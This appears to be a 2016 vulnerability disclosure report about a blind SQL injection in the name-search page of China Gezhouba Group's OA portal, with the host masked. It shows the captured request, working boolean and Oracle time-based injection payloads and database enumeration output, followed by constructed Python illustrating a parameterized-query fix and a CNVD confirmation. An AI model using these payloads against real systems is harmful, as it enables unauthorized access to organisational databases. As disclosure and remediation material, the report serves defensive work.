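2016-04-12: Details reported to the vendor; awaiting vendor handling
2016-04-15: Vendor has confirmed; details disclosed only to the vendor
2016-04-25: Details disclosed to core white hats and experts in related fields
2016-05-05: Details disclosed to regular white hats
2016-05-15: Details disclosed to trainee white hats
2016-05-30: Details disclosed to the public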
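As the title says.
China Gezhouba Group OA system: http://**.**.**.**/portal/c
Click "Get account". Then comes the key point: this page provides a function to look up an account by name.
Captured request: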
POST /portal/html/portlets/searchPerson/search.jsp HTTP/1.1
Host: **.**.**.**
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/portal/html/portlets/searchPerson/search.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000xt-VcpfwJQY0baekj1_UW9z:-1

keyword=%CD%F5&submit=%CC%E1%BD%BB
Place: POST
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=%CD%F5%' AND 6138=6138 AND '%'='&submit=%CC%E1%BD%BB

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: keyword=%CD%F5%' AND 4512=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(102)||CHR(75)||CHR(103),5) AND '%'='&submit=%CC%E1%BD%BB
---
back-end DBMS: Oracle
current user is DBA: False
Oracle
database management system users [81]:
Filter the input.
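A bind variable is a more reliable fix for this search than string filtering. The following is an added example, not code from the OA system or from the original report. It assumes the search builds `name LIKE '%<keyword>%'` by string concatenation, which the shape of the payload above suggests, and it uses SQLite in place of Oracle; the table, columns, function names and sample rows are all constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; in-memory SQLite stands in for the Oracle back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE person (name TEXT, account TEXT)")
    db.executemany("INSERT INTO person VALUES (?, ?)",
                   [("王伟", "wangwei"), ("王芳", "wangfang"), ("李娜", "lina")])
    return db

def search_vulnerable(db, keyword):
    # Assumed shape of the flawed query: the keyword is pasted into the LIKE
    # literal, so a quote in the input ends the literal and the rest runs as SQL.
    sql = "SELECT account FROM person WHERE name LIKE '%" + keyword + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(keyword, esc="\\"):
    # Neutralise LIKE wildcards so '%' or '_' cannot widen the match
    # and turn a name lookup into a full account listing.
    for ch in (esc, "%", "_"):
        keyword = keyword.replace(ch, esc + ch)
    return keyword

def search_safe(db, keyword, max_len=64):
    # Length/empty checks are a second layer; the bind variable is the fix.
    keyword = keyword.strip()
    if not keyword or len(keyword) > max_len:
        return []
    sql = "SELECT account FROM person WHERE name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(keyword) + "%"
    return [row[0] for row in db.execute(sql, (pattern,))]

if __name__ == "__main__":
    db = make_db()
    probe = "王%' AND 6138=6138 AND '%'='"   # boolean payload from the report
    print(search_vulnerable(db, probe))  # injected condition is evaluated as SQL
    print(search_safe(db, probe))        # same input is only a literal name: no rows
    print(search_vulnerable(db, "%"))    # bare wildcard lists every account
    print(search_safe(db, "%"))          # escaped wildcard matches nothing
```

With Oracle and JDBC the same pattern is a `PreparedStatement` with `LIKE ? ESCAPE '\'`, and the least-privilege point still applies: the portal's database account should not be able to see other schemas.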
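Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2016-04-15 16:04
CNVD confirmed and reproduced the situation described, and has passed it through CNCERT to the competent authority for informatization in the energy sector, which will follow up and coordinate handling with the organization that manages the website.
None for now.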